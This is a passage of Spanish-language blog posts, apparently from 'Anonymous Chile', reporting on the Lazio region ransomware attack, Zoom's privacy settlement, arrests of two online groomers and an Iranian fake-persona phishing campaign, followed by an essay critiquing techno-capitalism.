El ataque fue perpetrado por actores desconocidos y comenzó en la madrugada del domingo. El consejero de salud de la región de Lazio, Alessio D’Amato, ha explicado que «los técnicos están trabajando para reactivar de forma segura las nuevas reservas y no se han robado datos», aunque los más de 500.000 ciudadanos que ya habían reservado sus vacunas con citas hasta el próximo 13 de agosto podrán acudir a inocularse.

Sin embargo, D’Amato reconoció que la administración había sufrido «el ataque cibernético más grave jamás llevado a cabo contra una administración pública italiana». Los ciberdelincuentes dejaron una solicitud de rescate genérica para devolver los archivos cifrados

El ataque cifró tanto los archivos como las actividades del sistema, pero las fuentes consultadas por la CNN aseguran que aún no han podido identificar cómo llegó el malware. Eso significa que, a pesar de que las «partes infectadas» han sido aisladas, el malware aún podría continuar propagándose por el sistema.

El presidente de la región de Lazio asegura que los ciberdelincuentes proceden «de un país extranjero».

Según informan los investigadores, la buena noticia es que los piratas informáticos no han violado datos sensibles de salud. Mientras, la fiscalía de Roma que investiga lo sucedido ha calificado los delitos como «acceso no autorizado» y «daño agravado a un sistema informático». Los trabajadores tecnológicos de la región continúan enfrentándose al ataque para evitar su propagación.

Nicola Zingaretti, presidente de la región de Lazio, ha asegurado que los delincuentes proceden «de un país extranjero», aunque no han sido identificados. También pidió disculpas a los ciudadanos por los retrasos que están acumulando otros servicios y aseguró que las emergencias siguen funcionando con normalidad.

Comunicado Regione Lazio en Facebook

En la noche entre sábado y domingo la Regione Lazio sufrió un primer ataque ciber de matriz criminal. No sabemos quiénes son los responsables y sus fines.

El ataque bloqueó casi todos los archivos del centro de tratamiento de datos. La campaña de vacunación continúa regularmente para todos aquellos que se han reservado. En los próximos días se abrirán las reservas de vacunas por ahora suspendidas. Actualmente, el sistema está apagado para permitir una verificación interna y evitar la propagación del virus introducido con el ataque.

LazioCrea nos comunica que los datos de sanidad están seguros, así como los financieros y del presupuesto.

Estamos migrando a la nube externa los servicios esenciales para que funcionen lo antes posible. Agradezco al consejo regional que hoy, a pesar de la red firme, decidió celebrar la reunión del consejo. Una señal importante que no paramos.

Como presidente, en agradecerles su compromiso, hago un llamado a todos los operadores y empleados a no rendirnos y seguir adelante en la actividad administrativa. Pedimos disculpas a los ciudadanos por los retrasos inevitables.

112, Ares 118, Emergencias, Centro de Transfusión y Protección Civil están con seguridad y están prestando servicios regularmente.

Green Pass se envía de forma habitual, gracias a la colaboración con la autoridad comisaria. En cuanto al CUP: estamos trabajando para ponerlo de nuevo en funcionamiento. Para solicitar el rendimiento se puede contactar al centro de llamadas al número 06 39. 99 Las citas ya agendadas se realizarán con regularidad.

La situación es grave y seria y hemos alertado desde ya a la Policía Postal y a los máximos niveles del Estado a los que agradecemos.

Zoom es multado por problemas de privacidad y zoombombing

Publicada el 16/08/2021 por Anonymous Chile

Zoom ha acordado pagar 85 millones de dólares para resolver una demanda que acusaba al gigante de las videoconferencias de violar la privacidad de los usuarios al compartir sus datos con terceros sin permiso y permitir los incidentes conocidos como «Zoombombing».

La empresa estadounidense de origen chino Zoom Video Communications, propietaria de la aplicación más popular videoconferencia durante la pandemia de coronavirus, alcanzó un acuerdo extrajudicial para pagar 85 millones de dólares (71,6 millones de euros) por una demanda colectiva que le acusa de haber violado el derecho a la privacidad de los usuarios.

Zoom mintió sobre el cifrado de extremo a extremo

Zoom pagará 85 millones de dólares, a los abogados de demanda colectiva y a los usuarios, por mentir a los usuarios sobre el cifrado de extremo a extremo y por proporcionar datos de usuario a Facebook y Google sin su consentimiento.

El acuerdo propuesto generalmente les daría a los usuarios de Zoom $ 15 o $ 25 cada uno y se presentó el sábado en el Tribunal de Distrito de los EE. UU. Para el Distrito Norte de California. Se produjo nueve meses después de que Zoom aceptara mejoras de seguridad y una «prohibición de tergiversaciones de privacidad y seguridad» en un acuerdo con la Comisión Federal de Comercio, pero el acuerdo de la FTC no incluía compensación para los usuarios.

Los problemas de privacidad y el zoombombing le cuestan a Zoom 85 millones de dólares

Esa demanda fue presentada en marzo de 2020, en pleno auge de la plataforma, gracias al confinamiento, en el Tribunal del Distrito Norte de California, Estados Unidos, y acaba de resolverse gracias a la cantidad mencionada. El acuerdo requiere la aprobación de la jueza de distrito en San José (la capital del Valle de Santa Clara, donde se ubica Silicon Valley y donde tiene sus oficinas centrales Zoon), California, para ser finalizado.

Aunque Zoom recaudó alrededor de 1.300 millones de dólares en suscripciones a Zoom Meetings, los abogados de los demandantes calificaron el acuerdo de 85 millones de dólares como razonable dados los riesgos del litigio. Tienen la intención de solicitar hasta 21,25 millones de dólares para los honorarios legales.

Por un lado, está el acuerdo de pagar 85 millones de dólares, por el que los clientes podrían recibir un reembolso del 15% de su suscripción o de 25 o de 15 dólares si la demanda alcanza el estatus de acción colectiva.

Además de esto, Zoom ha dicho que tomará medidas adicionales para evitar que los intrusos se cuelen en las reuniones. Por ejemplo, deberá alertar a los usuarios cuando los anfitriones de las reuniones u otros participantes utilizan aplicaciones de terceros en las reuniones, y tendrá que proporcionar formación especializada a los empleados sobre privacidad y manejo de datos.

Problemas de privacidad de Zoom

Zoom se ha enfrentado a muchas acusaciones relacionadas con la falta de privacidad en la plataforma, sobre todo desde que se hiciese tan popular en el confinamiento masivo que vivimos en primavera de 2020 para frenar los contagios de la Covid-19 (la pandemia nos ha hiperconectado, se ha llegado a decir).

Una de las primeras polémicas se produjo en marzo cuando se descubrió que la aplicación de Zoom para iOS compartía la ubicación y otros datos con Facebook sin permiso, algo que se solucionó con una actualización y una disculpa. Otra polémica llegó cuando se hizo público que las videollamadas de Zoom no estaban cifradas de extremo a extremo. La Universidad de Toronto concluyó que ese cifrado de Zoom facilitaba que China monitorizase videollamadas de usuarios de todo el mundo.

Todos estos escándalos forzaron a la empresa a ir anunciando novedades de seguridad y nuevas funciones de privacidad para volver a ganarse la confianza de los usuarios, como actualizaciones o versiones más centradas en estos asuntos.

La demanda también acusa a Zoom de compartir datos con otras redes sociales

Cabe recordar que la demanda presentada en marzo de 2020 y resulta (por el momento) hoy también acusaba a la empresa de compartir datos personales de los usuarios con terceros, como Facebook, Google y LinkedIn.

Por este motivo, ahora la plataforma deberá alertar a los usuarios cuando los anfitriones de las reuniones u otros participantes utilizan aplicaciones de terceros en las reuniones.

Detenidos por acosar a menores a través de internet

Publicada el 16/08/2021 por Anonymous Chile

Los arrestados, de Cartagena y Málaga, España, actuaban de forma independiente pero con un mismo modus operandi, centrado en hacerse pasar por adolescentes en redes sociales y solicitar material pornográfico a las víctimas.

¿Qué es el Grooming?

Un engaño pederasta, más conocido por el anglicismo grooming (del verbo to groom, que alude a conductas de acercamiento o preparación para un determinado fin) o ciberacoso​ es una serie de conductas y acciones emprendidas por un adulto, a través de Internet,​ con el objetivo deliberado de ganarse la amistad de un menor de edad, creando una conexión emocional con el mismo, con el fin de disminuir las preocupaciones del menor y poder abusar sexualmente de él.

La Policía Nacional detiene a dos groomers que acosaron a decenas de menores

En dos operaciones contra el child grooming:

  • Los detenidos, de manera independiente, rastreaban las diferentes redes sociales utilizadas habitualmente por menores de edad en busca de víctimas a las que poder acosar, intimidar y solicitar material pornográfico.
  • Para captar la atención inicial de las niñas hacían uso de técnicas de ingeniería social, haciéndose pasar por chicas de edad similar mediante la utilización de decenas de perfiles falsos en las principales plataformas y redes sociales.
  • Se ha identificado a una víctima en España y a otras 37 en Estados Unidos y Canadá.

Dos ‘groomers’ –adultos que se sirven de las redes sociales para acosar sexualmente a menores– han sido detenidos gracias a una investigación de la Policía Nacional de España. Ambos han sido puestos a disposición judicial y se encuentran en prisión provisional.

Los hombres actuaban de forma totalmente independiente, aunque su modus operandi era idéntico. El primero de los detenidos, residente en Málaga y de 27 años, supuestamente acosó a casi cuarenta menores. En concreto, las víctimas se elevan a 37 entre Estados Unidos y Canadá, y una en España. Para localizar a este primer ‘groomer’ la policía estadounidense contactó a través de la embajada americana con los servicios de seguridad españoles. Dos denuncias de chicas menores de edad dieron inicio a la investigación en Estados Unidos. Las pesquisas concluyeron que el sospechoso podía encontrarse en España.

Finalmente se localizó al sujeto, de 27 años y que vive con su familia en Málaga. Acumulaba gran cantidad de archivos sexuales de menores. Durante el transcurso de la investigación se fue localizando a más víctimas hasta llegar a las 38 niñas. Contactaba con las menores a través de una conocida red social haciéndose pasar por una adolescente de su edad. Una vez había obtenido algún archivo de tipo sexual mostraba una gran agresividad y amenazaba con publicar las fotografías.

El segundo, un varón de 30 años y vecino de Cartagena, fue localizado gracias a la denuncia de la madre de una menor de doce años con la que había contactado. Los servicios policiales aún no han desvelado el numero de víctimas de este segundo sujeto. Lo que sí consta es que acumulaba en su casa gran cantidad de material pornográfico de abuso de menores – lo que en sí mismo constituye un delito. Una vez había contactado con las menores desvelaba su identidad y solicitaba más material de contenido sexual intimidando a la víctima.

La agencia norteamericana Homeland Security Investigations (HSI) ha contribuido al desarrollo del presente dispositivo dando traslado de información operativa, en el marco de una intensa actividad de colaboración policial internacional desarrollada por Policía Nacional.

Agentes de la Policía Nacional española han detenido a dos groomers que acosaron a decenas de menores a través de las redes sociales, en dos operaciones recientemente culminadas contra el fenómeno conocido como child grooming. Los arrestados, de manera independiente, rastreaban las diferentes redes sociales utilizadas habitualmente por menores de edad en busca de víctimas a las que poder acosar, intimidar y solicitar material pornográfico. Para captar la atención inicial de las niñas hacían uso de técnicas de ingeniería social, haciéndose pasar por chicas de edad similar mediante la utilización de decenas de perfiles falsos en las principales plataformas y redes sociales. Los presuntos responsables son dos varones, de 27 y 30 años de edad, arrestados en las localidades de Marbella (Málaga) y Cartegena (Murcia). Se ha identificado a una víctima en España y a otras 37 en Estados Unidos y Canadá

Sus víctimas eran niñas de EEUU y Canadá

En el marco de este operativo contra el child grooming, los investigadores de la Unidad Central de Ciberdelincuencia hicieron uso de información operativa procedente del Homeland Security Investigations (HSI), fruto de la intensa actividad de colaboración policial internacional desarrollada por Policía Nacional. La policía norteamericana informó, a través de la Embajada de Estados Unidos en España, que dos niñas estadounidenses habían denunciado a un acosador sexual que podría localizarse en nuestro país, si bien este extremo no estaba confirmado.

El presunto acosador adoptaba férreas medidas de seguridad, hacía uso de herramientas de anonimización y adoptaba diferentes personalidades virtuales. Además, captaba a sus víctimas, principalmente niñas norteamericanas, a través de un sitio web gratuito que permite a los usuarios chatear con otras personas, niñas a las que posteriormente extorsionaba a través de una conocida red social. Durante el proceso de ciberacoso, el investigado mostraba una elevadísima agresividad hacia las menores, sometiéndolas a una gran presión y amenazándolas con difundir entre sus contactos las fotografías íntimas que había obtenido previamente de sus víctimas.

El transcurso de la investigación permitió identificar a treinta y seis víctimas en Estados Unidos y una en Canadá. Las primeras gestiones se centraron en la localidad de Marbella y, dado que el investigado exhibía un alto nivel de inglés, se barajó la posibilidad de que podría ser algún residente extranjero de larga duración de esta ciudad. No obstante, según avanzaba la investigación, y se localizaban nuevas personalidades que el investigado habría asumido en Internet, esta hipótesis fue perdiendo fuerza. Finalmente, las pesquisas se centraron en una familia española, residente en esta localidad, cuyos miembros contaban con extraordinarios conocimientos en informática y robótica además de gran dominio del idioma anglosajón.

Durante la realización de la entrada y registro en el domicilio se comprobó el uso de elevadas medidas de seguridad en los dispositivos informáticos analizados. Las evidencias encontradas apuntaban al hijo de la familia como el presunto responsable de los hechos, hallando nuevas conversaciones en las que acosaba a menores e identificando a nuevas víctimas. Del análisis realizado en el material intervenido se ha logrado identificar a 36 víctimas en EEUU y una más en Canadá. Además, se localizó una elevada cantidad de archivos sexuales de menores. Una vez puesto a disposición judicial ingresó en prisión.

Otro acosador detenido en Cartagena

La investigación sobre el otro groomer se inició tras la denuncia de una mujer en la que su hija, de doce años de edad, estaba sufriendo acoso a través de las redes sociales. El presunto autor de los hechos habría abordado a la menor a través de una conocida plataforma, adoptando la identidad de otra menor de trece años. Una vez ganada su confianza, le habría confesado que realmente se trataba de un varón mayor de edad, procediendo al envío de fotografías de sus genitales y demandando material sexual explícito de la menor.

Tras un complejo proceso de identificación el presunto acosador resultó ser un individuo de treinta años, residente en Cartagena. El registro en su domicilio permitió acreditar que tenía una gran cantidad de material de abuso sexual infantil y que había llegado a utilizar hasta diez personalidades distintas en la Red, en función de las niñas con las que contactaba.

 

Contratistas de defensa son engañados por instructoras de Aerobics que hackearon sus correos electrónicos

Publicada el 16/08/2021 por Anonymous Chile

Un grupo de hacking TA456 con sede en Irán ha pasado alrededor de un año y medio operando una campaña de malspam en la que se hacen pasar por instructoras de aeróbic con el fin de espiar e infectar con malware a empleados y contratistas de defensa y agencias aeroespaciales tratando de robar información confidencial. El grupo de ciberdelincuencia TA456, alineado con los intereses del Estado iraní utilizaron durante años técnica ingeniería social para manipular a un empleado con acceso a información sensible. Se trataba de un trabajador de una pequeña filial de defensa aeroespacial. Sin duda se confirma una vez más, que muchas veces en un ataque informático, el eslabón más débil es el humano.

Acorde a los especialistas de Proofpoint, los operadores de esta campaña crearon un perfil falso supuestamente controlado por la instructora de aeróbics “Marcella Flores”, usando plataformas como Facebook, Instagram y servidores email para engañar a los usuarios afectados. Los atacantes usan estos falsos perfiles para engañar a los usuarios y distribuir malware con relativa facilidad.

Los expertos han atribuido esta campaña al grupo de hacking identificado como TA456 o Tortoiseshell, grupo de hacking auspiciado por el gobierno de Irán y muy cercano a Islamic Revolutionary Guard Corps (IRGC).

En los perfiles de redes sociales creados por los actores de amenazas, se anuncia a Marcella Flores como una experta instructora de aeróbics que reside en la ciudad inglesa de Liverpool y cuenta con una larga lista de supuestos amigos, contactos profesionales y clientes. Los hackers usan los perfiles de Marcella Flores para buscar a personas de interés en estas plataformas, ofreciendo sus supuestos servicios como entrenadora personal, solicitando responder a una encuesta de alimentación e incluso coqueteando con los usuarios afectados.

La propia empresa de Mark Zuckerberg anunció el pasado 15 de julio que había eliminado varias cuentas de Facebook e Instagram, incluyendo la de la ficticia Marcella, al formar parte de una acción de ciberespionaje.

La campaña de piratería duró años, según Proofpoint, que dice que «Flores» se hizo amigo del empleado de una pequeña subsidiaria de un contratista de defensa aeroespacial en 2019. Luego comenzaron a charlar con el empleado en noviembre de 2020, enviándoles correos electrónicos y fotografías. , e incluso un «video benigno pero coqueto a través de una URL de OneDrive», según Proofpoint. En junio de 2021, los investigadores dicen que TA456 envió al empleado una «encuesta de dieta» falsa con malware para robar nombres de usuario, contraseñas y otros datos en junio de 2021. Proofpoint adjuntó una captura de pantalla del intento de piratería en su informe:

Después de ganar la confianza de los usuarios afectados, los atacantes usan una cuenta de Gmail personal para enviar un enlace de OneDrive donde supuestamente se alojan documentos personales; en realidad, esta plataforma aloja un archivo cargado con una nueva versión del malware Lideric, también conocido como Lempo. Este malware genera persistencia en los sistemas Windows para después comenzar a buscar y robar información confidencial como nombres de usuario y credenciales de acceso, las cuales son enviadas a un servidor controlado por los hackers.

LEMPO

La herramienta de reconocimiento de LEMPO es un script de Visual Basic que se descarga usando una macro de Excel. Aprovechando los comandos integrados de Windows, enumera el host de diversas formas, registra los datos recopilados y luego extrae la inteligencia a una cuenta de correo electrónico controlada por el actor utilizando Collaboration Data Objects (CDO) de Microsoft. CDO, anteriormente conocido como OLE Messaging o Active Messaging, es una interfaz de programación de aplicaciones incluida con los productos Microsoft Windows y Microsoft Exchange Server. Si bien la mayor parte de este análisis se basa en la muestra bloqueada por Proofpoint

La información comprometida permitiría a los actores de amenazas obtener acceso remoto a plataformas VPN y de administración remota, lo que podría permitir el despliegue de ambiciosas campañas de espionaje cibernético y sofisticados ataques de phishing. Después de recibir un reporte al respecto, Facebook eliminó los perfiles de Marcella Flores en sus diversas plataformas, además de publicar una alerta de seguridad relacionada con esta campaña de hacking.

Esta es una muestra clara de la sofisticación con la que los actores de amenazas pueden operar, creando una infraestructura integral para el despliegue de ambiciosas campañas de ingeniería social y phishing. Los usuarios deben tratar de evitar hacer contacto con una cuenta desconocida en redes sociales, especialmente si se trata de empleados o personal directivo en compañías contratistas gubernamentales.

Del capital al tecno-capitalismo

Publicada el 14/08/2021 - 14/03/2022 por Anonymous Chile

Por método intelectual, nos gusta mirar los procesos y su evolución a lo largo del tiempo, más que sus efectos. Es decir, tratar de comprender la genealogía de lo que hoy nos parece nuevo, pero que muchas veces es, en cambio, la re-propuesta del viejo capitalismo en formas que parecen como nuevas sólo porque van acompañadas de una nueva tecnología y de una nueva retórica que prescribe su aceptación social – aceptación de que a su vez es funcional a la adaptación del hombre y la sociedad a las necesidades del capital.

Digamos entonces que lo digital es una revolución industrial; que las redes sociales de hoy son la evolución (o más bien la involución) de los medios de comunicación de masas del siglo XX (en particular la televisión), de la industria cultural descrita a mediados del siglo XX por la Escuela de Frankfurt y de la sociedad “Debordiana” del entretenimiento; y que las plataformas son la evolución de la fábrica fordista, que son necesarias para la transformación de toda la sociedad en una fábrica. Una sociedad industrializada, no industrial.

Por tanto, ningún cambio de paradigma se producirá sin una transición a algo absolutamente nuevo. Creer lo contrario, que todo es verdaderamente nuevo, significa repetir los errores interpretativos del pasado, es no distinguir la evolución de los procesos industriales y capitalistas: siempre aparentemente revolucionarios, pero en verdad siempre transformistas. Es decir: cambiar todo para no cambiar nada en su estructura y superestructura, no cambiar los mecanismos de la organización industrial de la sociedad y de la acumulación de capital.

En todo caso, lo que cambia (esto es una evolución y no una revolución) es la capacidad del tecnocapitalismo para producir / extraer valor, gracias a la tecnología, cada vez mayores de la vida de los seres humanos y de la sociedad. Procesos evolutivos que están estrictamente conectados a lo que la tecnología permite que el capitalismo haga con el trabajo y la vida humana, en las diferentes fases de los procesos de innovación.

Un capitalismo siempre replicándose, pero también refinando esa racionalidad instrumental / industrial, que es la verdadera superestructura de la modernidad, y dentro de la cual la racionalidad neoliberal, de los últimos cuarenta años, es sólo una de las formas funcionamiento de la política -como el populismo y la tecnocracia- pero nunca como la parte fundamental del sistema. Centrarse únicamente en la racionalidad neoliberal significa ver solo una parte de un proceso mucho más complejo y, por lo tanto, significa alejarse de su comprensión.

Una pequeña reflexión sobre el capitalismo

Para realizar este análisis genealógico se debería releer El Capital de Marx. Y leer es observar, estudiar, analizar, comparar el presente con el pasado del capitalismo: un capital aparentemente diferente pero sustancialmente semejante al descrito por Marx y similar al capitalismo del siglo XX, porque siempre se fundamenta sobre la división social del trabajo y, luego sobre su recomposición / integración en una estructura organizada mayor que la simple suma de sus partes previamente divididas, todo gracias a un medio de producción que en realidad es un medio de conexión (la línea de montaje, ayer; las plataformas, hoy). Porque, siempre se asienta en la explotación del trabajo excedente; siempre nos toma como sujetos productivos (incluso cuando nos engañe que somos empresarios de nosotros mismos) y al mismo tiempo somos sujetos consumidores de los bienes producidos- incluidos aquellos bienes particulares producidos por los medios de comunicación y por lo que la Escuela de Frankfurt llamó la industria cultural.

El capitalismo, que es cada vez más tecnocapitalismo como prefiero llamarlo, es hoy un sistema de técnica y capitalismo-neoliberalismo casi autorreferencial y cada vez más integrado, donde la técnica y la tecnología alimentan el crecimiento del segundo y viceversa; lo llamo tecnocapitalismo porque considero incorrecto y engañoso centrar la atención solo en el capitalismo o en sus procesos de financiarización, porque aguas arriba está precisamente la técnica que determina lo que el capitalismo puede hacer o no hacer (y viceversa).

Un tecnocapitalismo que nos ha hecho entrar no tanto en el capitaloceno como en el tecnoceno, donde está la tecnología – o mejor dicho, la racionalidad instrumental / calculadora-industrial- llega a ser el amo, imponiendo su lógica construyendo la superestructura real del mundo, cada vez más integrada con lo que una vez se llamó estructura.

Capitalismo de ayer y tecnocapitalismo de hoy.

Leer el tecnocapitalismo de hoy también es releer El Capital de Marx, y con esto podemos recordar al “inefable Dr. Ure” (como lo llamó Marx en el decimotercer capítulo del primer libro de El Capital) y, cuántos inefables Dr. Ure, generaron la llamada cuarta revolución industrial: la red, la industria 4.0 y ahora último el capitalismo verde, ecológico. Una reconversión, que parafraseando a von Clausewitz, es la continuación del capitalismo con otras formas.

El Doctor Andrew Ure publicó en 1835, “La filosofía de las manufacturas”; un libro que trató de demostrar que eran falsas las acusaciones de explotación del trabajo industrial, en particular del trabajo infantil; con parámetros seudo-científicos quiso demostrar que los niños que trabajaban en las fábricas eran más sanos, más altos e incluso más inteligentes que los demás.

Así que pensemos en cuántos inefables Dr. Ure han construido la narrativa de una técnica liberadora, democrática y libre, argumentando que la red digital nos hizo más inteligentes, que gracias a la red trabajamos menos, con menos esfuerzo y que tenemos más tiempo libre para las cosas buenas de la vida, que incluso los molestos ciclos económicos desaparecerían, abriendo el mundo a una nueva era de crecimiento infinito gracias a las nuevas tecnologías.

Todo esto eran las figuraciones mayoritarias de los 90. Este era el estado de ánimo dominante en ese momento que el economista Joseph Stiglitz nos recuerda en sus libros. Años en los que todos fuimos capturados, como niños, por esa narrativa: un cuento de hadas hermoso con la promesa de un hermoso final feliz. Ser capturado fue posible porque lamentablemente la izquierda, que miró y mira (en realidad cada vez menos) el capitalismo y su acción incesantemente revolucionaria (nuevamente Marx) no entendió que es precisamente la tecnología la que ha transformado el capitalismo por enésima vez.

La izquierda ha vivido demasiado tiempo en el mito de un uso distinto al de la tecnología capitalista, olvidando que la tecnología no es neutral, que es capitalista y que el capitalismo es esa técnica, es decir, una técnica racionalidad instrumental / calculadora-industrial basada en la búsqueda obsesiva de la eficiencia, del rendimiento, de la ganancia, del aumento e intensificación de la productividad y del excedente de mano de obra.

Una izquierda que incluso creía que las nuevas tecnologías ya eran la transición al socialismo o que eran al menos la realización del intelecto general imaginando pasar al pos-capitalismo (Paul Mason) gracias a las nuevas tecnologías.

Lo sabemos, pero casi no queremos admitirlo. Sobre todo, hay una izquierda no quiere admitirlo, una izquierda tecno- entusiasta que llega a suponer que Amazon es “lo nuevo” que avanza y no la vieja explotación del trabajo que vuelve. Sabemos que – a diferencia de la fábula de los 90 – ocurrió exactamente lo contrario; pero no por una desagradable heterogénesis de fines, sino porque lo que se ha logrado está en la esencia de la tecnología y del capitalismo: explotación de la naturaleza y del hombre; aumento continuo – gracias a las nuevas tecnologías – de los tiempos de trabajo y del ciclo de vida, por lo tanto de la productividad mediante el aumento de la mano de obra excedente, maximizando la plusvalía privada; además, incesantes procesos de integración e hibridación del hombre con las máquinas y con aparatos cada vez más eficaces y, por tanto, con más alienación, todo este bien disfrazada por técnicas de gestión psicológica cada vez más refinadas por una industria cultural cada vez más penetrante y poderosa, por una industria Debordiana de lo espectacular integrada a la industria de la felicidad y la diversión.

Sabemos de las crecientes desigualdades; pero nadie se opone abiertamente, y nadie o muy pocos, quieren realmente leer el capital de hoy (tecnocapitalismo) y volver a leer el Capital de Marx para interpretar el tecnocapitalismo de hoy – pero, sobre todo, releer la teoría crítica de la primera Escuela de Frankfurt, muy útil para comprender la sociedad tecnológica de ayer y de hoy.

Nos han embrujado los muchos e inefables nuevos Dr. Ure (Steve Jobs que, sin embargo, explota a los trabajadores chinos de Foxconn; Jeff Bezos que no explota a niños sino a sus empleados y mensajeros de reparto, e impone el brazalete electrónico (y los obliga a orinar en botellas de plástico para reducir el tiempo de inactividad y maximizar la productividad).

Vivimos hechizados por las nuevas tecnologías y el marketing emocional que las ha acompañado (Silicon Valley es ante todo una fábrica de imaginarios colectivos); hechizados como niños por el teléfono inteligente y el juguete social y, por tanto, incapaces de ejercer el pensamiento crítico o al menos reflexivo. Por eso creemos que los avances no pueden ni deben detenerse, incluso si atentan contra la libertad humana, la autonomía, la democracia, los derechos civiles, políticos y sociales.

Y nos adaptamos -como si fuera un hecho inevitable- a lo que nos impone el sistema industrial y capitalista, cuando en realidad, todo está en manos de un empresario – (nuevamente Marx en el primer Libro del Capital) que es un fanático de la valorización y que obliga a la humanidad a producir por producir.

Y claro, hoy estamos pagando las consecuencias con la crisis climática y medioambiental. Un sistema sin otro propósito que producir y hacer que las personas produzcan (y consuman), utilizando aplicaciones de búsqueda guiada por la investigación previa de nuestros datos / perfiles, que hemos dejado en navegaciones anteriores. Algoritmos predictivos, algoritmos de recomendación, algoritmos de filtrado y predicción.

Y todo está regido por una industria que impone sus innovaciones sin evaluar su utilidad social y una deliberación democrática.

En 2011 Luciano Gallino denuncio el tecnocapitalismo, en Micro Mega, escribiendo: «La democracia, leemos en los manuales, es una forma de gobierno en la que todos los miembros de una comunidad tienen tanto el derecho como la posibilidad material de participar en la formulación de las decisiones que afectan a su existencia. En cambio, hoy la gran mayoría de la población está totalmente excluida de la resolución de las decisiones que se toman todos los días. La democracia ha sido expropiada por la acción de ese sujeto que se llama gran empresa. El hecho nuevo es que el poder del gran negocio es la capacidad de decidir, a discreción, qué producir, dónde producirlo, a qué costo. La gran empresa no sólo nunca es demasiado grande, también ha logrado imponer efectos sumamente negativos a la sociedad, la economía y la naturaleza”.

El fetichismo por la técnica y por la ceguera política ante los procesos reales desencadenados por el tecnocapitalismo- prácticamente nos han impedido comprender que la realidad no es diferente a la que impuso el capital en los siglos pasados ; que la Industria 4.0 es solo taylorismo digitalizado; que las redes sociales (nunca una palabra fue más profanada) son empresas privadas que intentan maximizar sus ganancias poniéndonos a trabajar las 24 horas del día para producir datos – estamos felices de hacerlo, creyendo que navegar por la red es gratis; que las plataformas son la nueva forma de la “fábrica, virtualizada”. Y, que esta realidad es más explotadora que el capitalismo de los siglos XIX y XX; que el sistema sigue basado en la división social; ayer en la fábrica física, hoy en la fábrica virtual.

No queremos ver que las plataformas, los algoritmos, la Inteligencia artificial y la digitalización han permitido al tecnocapitalismo dar un paso más allá del fordismo-taylorismo. Es decir, han puesto a trabajar (extrayendo valor / beneficio privado) a toda la vida de los seres humanos. Han transformada no solo el trabajo productivo y el consumo sino también los sentimientos, afectos, relaciones, la información (todo transformado en datos), permitiendo que se convierta en capitalismo de vigilancia y en capitalismo algorítmico / digital (sublimación del capitalismo extractivo). Han logrado un sistema capaz de modelar a toda la sociedad según las normas técnicas del capitalismo, por tanto, no deberíamos hablar hoy de una sociedad industrial o pos- industrial, sino de una sociedad totalmente industrializada.

Según esa racionalidad instrumental, criticada por Horkheimer y Adorno, la sociedad hoy se ha vuelto aún más instrumental, calculadora e industrial. Instrumental porque tiene como objetivo aumentar el excedente de trabajo y la productividad y, por tanto, la ganancia (el tecno- capitalista es un sistema cada vez más integrado e integrador).

Calculador, porque se basa en el cálculo capitalista y la evaluación de todo, incluido el hombre, transformado en capital humano – a través de sus datos / perfiles. Industrial, porque hoy todo es industria y todo se organiza, se produce y se consume industrialmente, incluida la familia, la cultura, la escuela, la universidad, las relaciones humanas, las cárceles y las vacunas.

Industria y sociedad industrializada

Los seres humanos estamos cada vez más aislados / des-socializados y, cada vez mejor y más fácilmente integrables y socializables (en el sentido función-rol) con el sistema industrial. Las Plataformas son el nuevo medio de producción ya que es un medio de conexión que permite que el sistema industrial salga de las antiguas fábricas mediante la subcontratación e individualización, transformando así al conjunto de la sociedad en una fábrica.

El tecno-capitalismo funciona no solo mediante la subcontratación / individualización del trabajo, también se organiza con la distribución de alimentos a través de algoritmos (plataformas que extraen plusvalía capitalista de manera similar a Uber); que transforman a los individuos en sujetos productivos y consumidores las 24 horas del día y no sólo las 8 horas como en la etapa del fordismo-taylorismo (Con el tiempo las otras 16 horas fueron un tiempo muerto intolerable para el capital que necesitó hacer productivos y consumidores a los individuos todo el tiempo posible, gracias precisamente a las nuevas tecnologías).

El escritor inglés John Lanchester tenía razón, al decir en 2017, que las redes sociales como Facebook son “la agencia de espionaje y publicidad / marketing más grande jamás construida en la historia del capitalismo”. En realidad, Facebook también es (decir esto parece una provocación, peor no lo es) es la fábrica más grande jamás construida en la historia, con 2.600 millones de trabajadores generando datos, incesantemente de forma gratuita y felices de hacerlo, sin darse cuenta que el más feliz de todo es el patrón de Facebook, Mark Zuckerberg.

Que esto – transformar la sociedad en un mercado, pero sobre todo en una fábrica y una industria – era la tendencia del capitalismo lo entendió, Francofortese Raniero Panzieri, hace sesenta años, cuando escribió el estrecho vínculo entre tecnología y capitalismo, entre capitalismo y racionalidad instrumental-industrial: «El desarrollo capitalista de la tecnología implica, a través de las diferentes fases de la racionalización de formas de integración cada vez más refinadas, un incremento creciente del control capitalista … con la progresiva expansión de la planificación de la fábrica al mercado y, al área social externa ”. Y, por tanto… “El mismo tipo de proceso que domina la fábrica, característico del momento productivo, tiende a imponerse al conjunto de la sociedad los que son los rasgos característicos de la fábrica (…) y, tienden a impregnar todos los niveles de la sociedad».

Es decir, el capitalismo – nuevamente Panzieri – intenta por todos los medios «extender su racionalización más allá de los límites de la fábrica». Tal como sucede hoy, a través de la red / digitalización / uberización / capitalismo de plataformas, redes sociales. Esta es una tendencia antigua e implícita en la racionalidad tecnológica capitalista, ya destacada por Lukács en 1922 en “Historia y conciencia de clase” y luego por la primera Escuela de Frankfurt.

Una tendencia que ahora ha llegado a producir la (casi) perfecta correspondencia / integración / identificación entre tecnocapitalismo y sociedad. Es decir, según la síntesis realizada por el filósofo y psicoanalista Romano Màdera, el capitalismo es ahora global “en el sentido de ocupa a todos los aspectos de la vida, exterior e interior. (…) Y el producto histórico-antropológico de la configuración cultural del capitalismo global es la humanidad como dispositivo de acumulación”. Lo que, sin embargo, no es solo capitalismo, sino tecnocapitalismo.

De las plataformas a los medios

Según los gurús de las nuevas tecnologías, ayer los medios de comunicación tenían una forma que podría caracterizarse de “uno a muchos” (por tanto, centralización, jerarquía, pasividad del receptor). Hoy es de “muchos a muchos (por tanto, los medios de comunicación, de hecho, digitales tienen productores, receptores, presentadores, y usuarios reunidos). Esta retorica permite enmascarar una ficción de horizontalidad, participación y democratización, que obligatoriamente pasa por una plataforma. Una plataforma que impone jerarquías que replican la centralización de la información (con algoritmos predictivos, algoritmos de recomendación, filtrado) y también estandarización.

